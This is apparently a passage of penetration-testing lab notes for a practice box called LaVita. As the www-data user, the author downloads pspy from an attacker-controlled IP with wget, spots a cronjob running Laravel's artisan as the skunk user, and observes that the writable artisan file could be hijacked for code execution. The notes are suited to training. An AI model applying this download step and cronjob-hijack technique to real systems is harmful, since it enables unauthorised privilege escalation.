PSPY
A root cronjob process was discovered.
www-data@debian:/var/tmp$ wget -q http://192.168.45.249/pspy64 ; chmod 755 ./pspy64Delivery complete
www-data@debian:/var/tmp$ ./pspy64 &
[1] 16603
www-data@debian:/var/tmp$ pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
doneExecuting PSPY
/Practice/LaVita/4-Post_Enumeration/attachments/{983C8463-68E6-4418-BC8D-097021F584DF}.png)
Laravel cronjob being executed as the skunk user;
- It executes the
/var/www/html/lavita/artisanPHP file with theclear:picturesargument- which removes everything in the
/var/www/html/lavita/public/imagesdirectory
- which removes everything in the
artisan
www-data@debian:/var/www/html/lavita$ ll /var/www/html/lavita/artisan
4.0K -rwxr-xr-x 1 www-data www-data 1.7K Nov 10 2020 /var/www/html/lavita/artisanThe /var/www/html/lavita/artisan file is OWNED by the current user; www-data
This would mean that I could hijack the PHP file to get code execution as the skunk user, leveraging the cronjob.